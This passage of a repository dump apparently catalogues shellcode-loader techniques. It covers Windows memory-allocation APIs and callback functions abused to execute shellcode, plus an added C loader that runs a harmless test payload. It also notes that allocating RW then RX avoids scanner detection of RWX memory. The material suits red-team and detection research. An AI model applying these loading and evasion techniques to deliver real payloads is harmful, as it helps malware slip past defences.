- [NTInternals NtFreeVirtualMemory](http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/Memory%20Management/Virtual%20Memory/NtFreeVirtualMemory.html)

--------------------------------------------------------------------------------
/windows/allocation/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

### Overview

The `allocation` step creates enough space to hold the shellcode after it has been extracted from its storage location (global/stack/resource/download). The allocated memory must be marked executable; otherwise DEP (Data Execution Prevention) raises an access-violation exception as soon as control is transferred into it.

Only the `Virtual*`, `Nt*VirtualMemory` and section APIs accept a page protection at allocation time. The heap-style allocators in this directory (`HeapAlloc`, `RtlAllocateHeap`, `GlobalAlloc`, `CoTaskMemAlloc`, `AllocADsMem`) return ordinary non-executable heap memory, so the pages holding the block have to be changed with the functions under `permission` before execution.

--------------------------------------------------------------------------------
/windows/allocation/RtlAllocateHeap/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Allocate memory for executing shellcode later.

### Overview

Allocation with `RtlAllocateHeap`. The block is taken from a separate heap created with `RtlCreateHeap`, not from the process default heap.

```c++
PVOID RtlAllocateHeap (PVOID HeapHandle, ULONG Flags, SIZE_T Size);

PVOID RtlCreateHeap (ULONG Flags, PVOID HeapBase, SIZE_T ReserveSize, SIZE_T CommitSize, PVOID Lock, PRTL_HEAP_PARAMETERS Parameters);

LOGICAL RtlFreeHeap (PVOID HeapHandle, ULONG Flags, PVOID BaseAddress);

PVOID RtlDestroyHeap (PVOID HeapHandle);
```

### Reference

- [MSDN RtlAllocateHeap](https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-rtlallocateheap)
- [MSDN RtlCreateHeap](https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-rtlcreateheap)
- [MSDN RtlFreeHeap](https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-rtlfreeheap)
- [MSDN RtlDestroyHeap](https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-rtldestroyheap)

--------------------------------------------------------------------------------
/windows/allocation/VirtualAlloc/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Allocate memory for executing shellcode later.

### Overview

Allocation with `VirtualAlloc` and deallocation with `VirtualFree`.
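The two-stage flow that `windows/allocation/README.md` describes (allocate, copy the payload in, then mark the pages executable so DEP does not fault) done with the three functions listed in this README, as an added example that is not code from the Reversing.ID repository. The Windows branch uses `VirtualAlloc`/`VirtualProtect`/`VirtualFree`; a POSIX branch using `mmap`/`mprotect`/`munmap`, mirroring the repository's `linux/execution/invoke` loader, lets the same file build and run on Linux. The `return 42` payload bytes are constructed for the example, and `alloc_rw`, `make_rx`, `free_region` and `load_and_run` are this example's own names.

```c
/* Added example for the shellcode-loader write-up; not code from the
 * Reversing.ID repository. Two-stage W^X loading: allocate RW, copy the
 * payload, flip the pages to RX (never RWX), flush the instruction cache,
 * call the payload, release the region. */
#define _DEFAULT_SOURCE 1          /* exposes MAP_ANONYMOUS on glibc in strict -std modes */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#ifdef _WIN32
#include <windows.h>
#else
#include <sys/mman.h>
#endif

/* Test payload, constructed for this example: "return 42" for the build architecture. */
#if defined(__x86_64__) || defined(_M_X64)
static const uint8_t kPayload[] = { 0xB8, 0x2A, 0x00, 0x00, 0x00, 0xC3 };            /* mov eax, 42 ; ret */
#elif defined(__aarch64__) || defined(_M_ARM64)
static const uint8_t kPayload[] = { 0x40, 0x05, 0x80, 0x52, 0xC0, 0x03, 0x5F, 0xD6 }; /* mov w0, #42 ; ret */
#else
#error "no test payload for this architecture"
#endif

/* Stage 1 (allocation): a private region that is readable and writable only.
 * Returns NULL on failure. */
void *alloc_rw(size_t len)
{
#ifdef _WIN32
    return VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
#else
    void *p = mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    return p == MAP_FAILED ? NULL : p;
#endif
}

/* Stage 2 (permission): drop write, add execute, and make the freshly written
 * bytes visible to the instruction fetch path. Returns 0 on success, -1 on failure. */
int make_rx(void *p, size_t len)
{
#ifdef _WIN32
    DWORD old_protect;
    if (!VirtualProtect(p, len, PAGE_EXECUTE_READ, &old_protect))
        return -1;
    FlushInstructionCache(GetCurrentProcess(), p, len);
    return 0;
#else
    if (mprotect(p, len, PROT_READ | PROT_EXEC) != 0)
        return -1;
    __builtin___clear_cache((char *)p, (char *)p + len); /* needed on AArch64, a no-op on x86 */
    return 0;
#endif
}

/* Release the region once the payload has returned. */
void free_region(void *p, size_t len)
{
#ifdef _WIN32
    (void)len;
    VirtualFree(p, 0, MEM_RELEASE);
#else
    munmap(p, len);
#endif
}

/* Whole loader: returns the payload's return value, or -1 if any stage failed.
 * The payload must behave as a function taking no arguments and returning an
 * int in the architecture's return register. */
int load_and_run(const uint8_t *payload, size_t len)
{
    void *region = alloc_rw(len);
    if (region == NULL)
        return -1;

    memcpy(region, payload, len);              /* writing: pages are RW, not executable */

    if (make_rx(region, len) != 0) {           /* permission: now RX, no longer writable */
        free_region(region, len);
        return -1;
    }

    int (*fn)(void) = (int (*)(void))region;   /* execution: direct call on this thread */
    int rc = fn();

    free_region(region, len);
    return rc;
}

int main(void)
{
    int rc = load_and_run(kPayload, sizeof kPayload);
    printf("payload returned %d\n", rc);
    return rc == 42 ? 0 : 1;
}
```

Requesting `PAGE_EXECUTE_READWRITE` in a single `VirtualAlloc` call also satisfies DEP, but a private RWX region is the first thing most memory scanners flag; the RW then RX sequence above leaves no point at which the pages are both writable and executable, and a zero-length or failed allocation is reported through the `-1` return instead of being dereferenced.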
```c++
LPVOID VirtualAlloc (LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);

BOOL VirtualProtect (LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect);

BOOL VirtualFree (LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType);
```

### Reference

- [MSDN VirtualAlloc](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualalloc)
- [MSDN VirtualProtect](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualprotect)
- [MSDN VirtualFree](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualfree)

--------------------------------------------------------------------------------
/windows/allocation/VirtualAlloc2/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Allocate memory for executing shellcode later.

### Overview

Allocation with `VirtualAlloc2` and deallocation with `VirtualFree`. `VirtualAlloc2` takes the target process handle and an optional array of extended parameters; with `ExtendedParameters` set to `NULL` and `ParameterCount` to `0` it behaves like `VirtualAllocEx`.

```c++
LPVOID VirtualAlloc2 (HANDLE Process, PVOID BaseAddress, SIZE_T Size, ULONG AllocationType, ULONG PageProtection, MEM_EXTENDED_PARAMETER * ExtendedParameters, ULONG ParameterCount);

BOOL VirtualProtect (LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect);

BOOL VirtualFree (LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType);
```

### Reference

- [MSDN VirtualAlloc2](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualalloc2)
- [MSDN VirtualProtect](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualprotect)
- [MSDN VirtualFree](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualfree)

--------------------------------------------------------------------------------
/windows/allocation/VirtualAllocEx/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Allocate memory for executing shellcode later.

### Overview

Allocation with `VirtualAllocEx` and deallocation with `VirtualFreeEx`. These take an explicit process handle, so the same calls work against the current process or a remote one opened with the required access rights.
8 | 9 | ```c++ 10 | LPVOID VirtualAllocEx(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect); 11 | 12 | BOOL VirtualProtectEx(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect); 13 | 14 | BOOL VirtualFreeEx(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType); 15 | ``` 16 | 17 | ### Reference 18 | 19 | - [MSDN VirtualAllocEx](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualallocex) 20 | - [MSDN VirtualProtectEx](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualprotectex) 21 | - [MSDN VirtualFreeEx](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualfreeex) 22 | -------------------------------------------------------------------------------- /windows/execution/asm-jmp/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | ### Overview 4 | 5 | Eksekusi shellcode dengan menuju langsung (jump) ke alamat shellcode. -------------------------------------------------------------------------------- /windows/execution/asm-jmp/rust/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "shellcode-loader" 3 | version = "0.1.0" 4 | edition = "2021" 5 | authors = ["Satria Ady Pradana "] 6 | 7 | [dependencies.winapi] 8 | version = "0.3.9" 9 | features = [ 10 | "errhandlingapi", 11 | "memoryapi", 12 | "processthreadsapi", 13 | "synchapi", 14 | "winbase", 15 | "winnt", 16 | ] -------------------------------------------------------------------------------- /windows/execution/callback/CallWindowProc/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `CallWindowProc`. 
```c++
LRESULT CallWindowProcA(WNDPROC lpPrevWndFunc, HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam);

LRESULT CallWindowProcW(WNDPROC lpPrevWndFunc, HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam);
```

### Reference

- [MSDN CallWindowProcA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-callwindowproca)
- [MSDN CallWindowProcW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-callwindowprocw)
--------------------------------------------------------------------------------
/windows/execution/callback/CertEnumPhysicalStore/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `CertEnumPhysicalStore`. `pfnEnum` is invoked once per physical store found under the system store named by `pvSystemStore`.

```c++
BOOL CertEnumPhysicalStore(const void *pvSystemStore, DWORD dwFlags, void *pvArg, PFN_CERT_ENUM_PHYSICAL_STORE pfnEnum);
```

### Reference

- [MSDN CertEnumPhysicalStore](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-certenumphysicalstore)
--------------------------------------------------------------------------------
/windows/execution/callback/CertEnumSystemStore/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `CertEnumSystemStore`. `pfnEnum` is invoked once per system store in the location selected by `dwFlags` (for example `CERT_SYSTEM_STORE_CURRENT_USER`).
```c++
BOOL CertEnumSystemStore(DWORD dwFlags, void *pvSystemStoreLocationPara, void *pvArg, PFN_CERT_ENUM_SYSTEM_STORE pfnEnum);
```

### Reference

- [MSDN CertEnumSystemStore](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-certenumsystemstore)
--------------------------------------------------------------------------------
/windows/execution/callback/CertEnumSystemStoreLocation/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `CertEnumSystemStoreLocation`. `pfnEnum` is invoked once per registered system store location, so no store content is required.

```c++
BOOL CertEnumSystemStoreLocation(DWORD dwFlags, void *pvArg, PFN_CERT_ENUM_SYSTEM_STORE_LOCATION pfnEnum);
```

### Reference

- [MSDN CertEnumSystemStoreLocation](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-certenumsystemstorelocation)
--------------------------------------------------------------------------------
/windows/execution/callback/CertFindChainInStore/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `CertFindChainInStore`. The callback is not a direct parameter: with `dwFindType` set to `CERT_CHAIN_FIND_BY_ISSUER`, `pvFindPara` points to a `CERT_CHAIN_FIND_BY_ISSUER_PARA` whose `pfnFindCallback` member is invoked for each chain that is built from the opened store.
```c++
PCCERT_CHAIN_CONTEXT CertFindChainInStore(HCERTSTORE hCertStore, DWORD dwCertEncodingType, DWORD dwFindFlags, DWORD dwFindType, const void *pvFindPara, PCCERT_CHAIN_CONTEXT pPrevChainContext);

HCERTSTORE CertOpenStore(LPCSTR lpszStoreProvider, DWORD dwEncodingType, HCRYPTPROV_LEGACY hCryptProv, DWORD dwFlags, const void *pvPara);

HCERTSTORE CertOpenSystemStoreA(HCRYPTPROV_LEGACY hProv, LPCSTR szSubsystemProtocol);

HCERTSTORE CertOpenSystemStoreW(HCRYPTPROV_LEGACY hProv, LPCWSTR szSubsystemProtocol);
```

### Reference

- [MSDN CertFindChainInStore](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-certfindchaininstore)
- [MSDN CertOpenStore](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-certopenstore)
- [MSDN CertOpenSystemStoreA](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-certopensystemstorea)
- [MSDN CertOpenSystemStoreW](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-certopensystemstorew)
--------------------------------------------------------------------------------
/windows/execution/callback/ChooseColor/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `ChooseColor`. The callback is the `lpfnHook` member of the `CHOOSECOLOR` structure and is only used when `CC_ENABLEHOOK` is set in `Flags`; the hook runs when the colour dialog is created, so an interactive desktop is required.
```c++
BOOL ChooseColor(LPCHOOSECOLOR lpcc);
```

### Reference

- [MSDN ChooseColor](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/ms646912(v=vs.85))
- [MSDN structure CHOOSECOLORA](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-choosecolora-r1)
- [MSDN structure CHOOSECOLORW](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-choosecolorw-r1)
--------------------------------------------------------------------------------
/windows/execution/callback/ChooseFont/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `ChooseFont`. The callback is the `lpfnHook` member of the `CHOOSEFONT` structure and is only used when `CF_ENABLEHOOK` is set in `Flags`.

```c++
BOOL ChooseFont(LPCHOOSEFONT lpcf);
```

### Reference

- [MSDN ChooseFont](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/ms646914(v=vs.85))
- [MSDN structure CHOOSEFONTA](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-choosefonta)
- [MSDN structure CHOOSEFONTW](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-choosefontW)
--------------------------------------------------------------------------------
/windows/execution/callback/CopyFile2/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `CopyFile2`. The callback is the `pProgressRoutine` member of `COPYFILE2_EXTENDED_PARAMETERS`; it is only invoked while a copy is actually in progress, so the source file must exist.
```c++
HRESULT CopyFile2(PCWSTR pwszExistingFileName, PCWSTR pwszNewFileName, COPYFILE2_EXTENDED_PARAMETERS *pExtendedParameters);
```

### Reference

- [MSDN CopyFile2](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-copyfile2)
--------------------------------------------------------------------------------
/windows/execution/callback/CopyFileEx/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `CopyFileEx`. The `lpProgressRoutine` parameter is called as the copy proceeds, so the source file must exist for the payload to run.

```c++
BOOL CopyFileExA(LPCSTR lpExistingFileName, LPCSTR lpNewFileName, LPPROGRESS_ROUTINE lpProgressRoutine, LPVOID lpData, LPBOOL pbCancel, DWORD dwCopyFlags);

BOOL CopyFileExW(LPCWSTR lpExistingFileName, LPCWSTR lpNewFileName, LPPROGRESS_ROUTINE lpProgressRoutine, LPVOID lpData, LPBOOL pbCancel, DWORD dwCopyFlags);
```

### Reference

- [MSDN CopyFileExA](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-copyfileexa)
- [MSDN CopyFileExW](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-copyfileexw)
--------------------------------------------------------------------------------
/windows/execution/callback/CreatePropertySheetPage/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `CreatePropertySheetPage`. The callback is the `pfnCallback` member of `PROPSHEETPAGE`, honoured only when `PSP_USECALLBACK` is set in `dwFlags`.
```c++
HPROPSHEETPAGE CreatePropertySheetPageA(LPCPROPSHEETPAGEA constPropSheetPagePointer);

HPROPSHEETPAGE CreatePropertySheetPageW(LPCPROPSHEETPAGEW constPropSheetPagePointer);
```

### Reference

- [MSDN CreatePropertySheetPageA](https://docs.microsoft.com/en-us/windows/win32/api/prsht/nf-prsht-createpropertysheetpagea)
- [MSDN CreatePropertySheetPageW](https://docs.microsoft.com/en-us/windows/win32/api/prsht/nf-prsht-createpropertysheetpagew)
- [MSDN structure PROPSHEETPAGE](https://docs.microsoft.com/en-us/windows/win32/controls/pss-propsheetpage)
--------------------------------------------------------------------------------
/windows/execution/callback/CryptDecodeMessage/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `CryptDecodeMessage`. The callback is the `pfnGetSignerCertificate` member of the `CRYPT_VERIFY_MESSAGE_PARA` passed through `pVerifyPara`; it is consulted when a signed message is decoded, so `pbEncodedBlob` has to be a parseable signed blob.

```c++
BOOL CryptDecodeMessage(DWORD dwMsgTypeFlags, PCRYPT_DECRYPT_MESSAGE_PARA pDecryptPara, PCRYPT_VERIFY_MESSAGE_PARA pVerifyPara, DWORD dwSignerIndex, const BYTE *pbEncodedBlob, DWORD cbEncodedBlob, DWORD dwPrevInnerContentType, DWORD *pdwMsgType, DWORD *pdwInnerContentType, BYTE *pbDecoded, DWORD *pcbDecoded, PCCERT_CONTEXT *ppXchgCert, PCCERT_CONTEXT *ppSignerCert);
```

### Reference

- [MSDN CryptDecodeMessage](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptdecodemessage)
- [MSDN structure CRYPT_VERIFY_MESSAGE_PARA](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/ns-wincrypt-crypt_verify_message_para)
--------------------------------------------------------------------------------
/windows/execution/callback/CryptEnumKeyIdentifierProperties/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `CryptEnumKeyIdentifierProperties`. `pfnEnum` is invoked once per key identifier property found; passing `NULL` for `pKeyIdentifier` enumerates all of them.

```c++
BOOL CryptEnumKeyIdentifierProperties(const CRYPT_HASH_BLOB *pKeyIdentifier, DWORD dwPropId, DWORD dwFlags, LPCWSTR pwszComputerName, void *pvReserved, void *pvArg, PFN_CRYPT_ENUM_KEYID_PROP pfnEnum);
```

### Reference

- [MSDN CryptEnumKeyIdentifierProperties](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptenumkeyidentifierproperties)
--------------------------------------------------------------------------------
/windows/execution/callback/CryptEnumOIDFunction/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `CryptEnumOIDFunction`. `pfnEnumOIDFunc` is invoked once per registered OID function that matches the encoding type, function name and OID filters; `NULL` filters match everything.

```c++
BOOL CryptEnumOIDFunction(DWORD dwEncodingType, LPCSTR pszFuncName, LPCSTR pszOID, DWORD dwFlags, void *pvArg, PFN_CRYPT_ENUM_OID_FUNC pfnEnumOIDFunc);
```

### Reference

- [MSDN CryptEnumOIDFunction](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptenumoidfunction)
--------------------------------------------------------------------------------
/windows/execution/callback/CryptEnumOIDInfo/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `CryptEnumOIDInfo`. `pfnEnumOIDInfo` is invoked once per registered OID info entry in the group selected by `dwGroupId` (0 enumerates all groups).
```c++
BOOL CryptEnumOIDInfo(DWORD dwGroupId, DWORD dwFlags, void *pvArg, PFN_CRYPT_ENUM_OID_INFO pfnEnumOIDInfo);
```

### Reference

- [MSDN CryptEnumOIDInfo](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptenumoidinfo)
--------------------------------------------------------------------------------
/windows/execution/callback/CryptInstallOIDFunctionAddress/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `CryptInstallOIDFunctionAddress`.

Install a function as a callback that is invoked when a new store is opened. Each `CRYPT_OID_FUNC_ENTRY` in `rgFuncEntry` maps a provider name (its `pszOID`) under the function set `pszFuncName` to a function address; installing under the store-provider set (`CRYPT_OID_OPEN_STORE_PROV_FUNC`, the string `"CertDllOpenStoreProv"`) makes `CertOpenStore` with that provider name call the installed address. `hModule` is the module the address lives in (`NULL` for the current executable), and `CertCloseStore` releases whatever the provider returned.

```c++
BOOL CryptInstallOIDFunctionAddress(HMODULE hModule, DWORD dwEncodingType, LPCSTR pszFuncName, DWORD cFuncEntry, const CRYPT_OID_FUNC_ENTRY rgFuncEntry[], DWORD dwFlags);

BOOL CryptFreeOIDFunctionAddress(HCRYPTOIDFUNCADDR hFuncAddr, DWORD dwFlags);

HCERTSTORE CertOpenStore(LPCSTR lpszStoreProvider, DWORD dwEncodingType, HCRYPTPROV_LEGACY hCryptProv, DWORD dwFlags, const void *pvPara);

BOOL CertCloseStore(HCERTSTORE hCertStore, DWORD dwFlags);
```

### Reference

- [MSDN CryptInstallOIDFunctionAddress](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptinstalloidfunctionaddress)
- [MSDN CryptFreeOIDFunctionAddress](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptfreeoidfunctionaddress)
- [MSDN CertOpenStore](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-certopenstore)
- [MSDN CertCloseStore](https://docs.microsoft.com/en-us/windows/win32/api/Wincrypt/nf-wincrypt-certclosestore)
--------------------------------------------------------------------------------
/windows/execution/callback/CryptVerifyMessageSignature/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `CryptVerifyMessageSignature`. As with `CryptDecodeMessage`, the callback is the `pfnGetSignerCertificate` member of `CRYPT_VERIFY_MESSAGE_PARA` and is reached only when `pbSignedBlob` parses as a signed message.

```c++
BOOL CryptVerifyMessageSignature(PCRYPT_VERIFY_MESSAGE_PARA pVerifyPara, DWORD dwSignerIndex, const BYTE *pbSignedBlob, DWORD cbSignedBlob, BYTE *pbDecoded, DWORD *pcbDecoded, PCCERT_CONTEXT *ppSignerCert);
```

### Reference

- [MSDN CryptVerifyMessageSignature](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptverifymessagesignature)
- [MSDN structure CRYPT_VERIFY_MESSAGE_PARA](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/ns-wincrypt-crypt_verify_message_para)
--------------------------------------------------------------------------------
/windows/execution/callback/DPA_DestroyCallback/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `DPA_DestroyCallback`. `pfnCB` is called once for every pointer stored in the array before the array itself is freed, so at least one element must be inserted with `DPA_InsertPtr` first.
```c++
void DPA_DestroyCallback(HDPA hdpa, PFNDAENUMCALLBACK pfnCB, void *pData);

HDPA DPA_Create(int cItemGrow);

int DPA_InsertPtr(HDPA hdpa, int i, void *p);
```

### Reference

- [MSDN DPA_DestroyCallback](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dpa_destroycallback)
- [MSDN DPA_Create](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dpa_create)
- [MSDN DPA_InsertPtr](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dpa_insertptr)
--------------------------------------------------------------------------------
/windows/execution/callback/DPA_EnumCallback/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `DPA_EnumCallback`. `pfnCB` is called once per stored pointer, so the array needs at least one element; `DPA_Destroy` frees it afterwards.

```c++
void DPA_EnumCallback(HDPA hdpa, PFNDAENUMCALLBACK pfnCB, void *pData);

HDPA DPA_Create(int cItemGrow);

BOOL DPA_Destroy(HDPA hdpa);

int DPA_InsertPtr(HDPA hdpa, int i, void *p);
```

### Reference

- [MSDN DPA_EnumCallback](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dpa_enumcallback)
- [MSDN DPA_Create](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dpa_create)
- [MSDN DPA_Destroy](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dpa_destroy)
- [MSDN DPA_InsertPtr](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dpa_insertptr)
--------------------------------------------------------------------------------
/windows/execution/callback/DSA_DestroyCallback/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `DSA_DestroyCallback`. `pfnCB` is called once per item held in the dynamic structure array before it is freed, so insert at least one item with `DSA_InsertItem` first.

```c++
void DSA_DestroyCallback(HDSA hdsa, PFNDAENUMCALLBACK pfnCB, void *pData);

HDSA DSA_Create(int cbItem, int cItemGrow);

int DSA_InsertItem(HDSA hdsa, int i, const void *pitem);
```

### Reference

- [MSDN DSA_DestroyCallback](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dsa_destroycallback)
- [MSDN DSA_Create](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dsa_create)
- [MSDN DSA_InsertItem](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dsa_insertitem)
--------------------------------------------------------------------------------
/windows/execution/callback/DSA_EnumCallback/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `DSA_EnumCallback`. `pfnCB` is called once per item, so the array needs at least one element; `DSA_Destroy` frees it afterwards.
```c++
void DSA_EnumCallback(HDSA hdsa, PFNDAENUMCALLBACK pfnCB, void *pData);

HDSA DSA_Create(int cbItem, int cItemGrow);

BOOL DSA_Destroy(HDSA hdsa);

int DSA_InsertItem(HDSA hdsa, int i, const void *pitem);
```

### Reference

- [MSDN DSA_EnumCallback](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dsa_enumcallback)
- [MSDN DSA_Create](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dsa_create)
- [MSDN DSA_Destroy](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dsa_destroy)
- [MSDN DSA_InsertItem](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dsa_insertitem)
--------------------------------------------------------------------------------
/windows/execution/callback/DialogBoxIndirectParam/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `DialogBoxIndirectParam`. `lpDialogFunc` is the dialog procedure for an in-memory `DLGTEMPLATE`; it receives `WM_INITDIALOG` as soon as the dialog is created, so the payload runs before anything is shown, but the call still needs a window station and desktop.
```c++
INT_PTR DialogBoxIndirectParamA(HINSTANCE hInstance, LPCDLGTEMPLATEA hDialogTemplate, HWND hWndParent, DLGPROC lpDialogFunc, LPARAM dwInitParam);

INT_PTR DialogBoxIndirectParamW(HINSTANCE hInstance, LPCDLGTEMPLATEW hDialogTemplate, HWND hWndParent, DLGPROC lpDialogFunc, LPARAM dwInitParam);
```

### Reference

- [MSDN DialogBoxIndirectParamA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-dialogboxindirectparama)
- [MSDN DialogBoxIndirectParamW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-dialogboxindirectparamw)
--------------------------------------------------------------------------------
/windows/execution/callback/DirectSoundCaptureEnumerate/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `DirectSoundCaptureEnumerate`. `lpDSEnumCallback` is invoked once per DirectSound capture device, so a machine with no capture device never reaches the payload.

```c++
HRESULT DirectSoundCaptureEnumerate(LPDSENUMCALLBACK lpDSEnumCallback, LPVOID lpContext);
```

### Reference

- [MSDN DirectSoundCaptureEnumerate](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ee416761(v=vs.85))
--------------------------------------------------------------------------------
/windows/execution/callback/DirectSoundEnumerate/README.md:
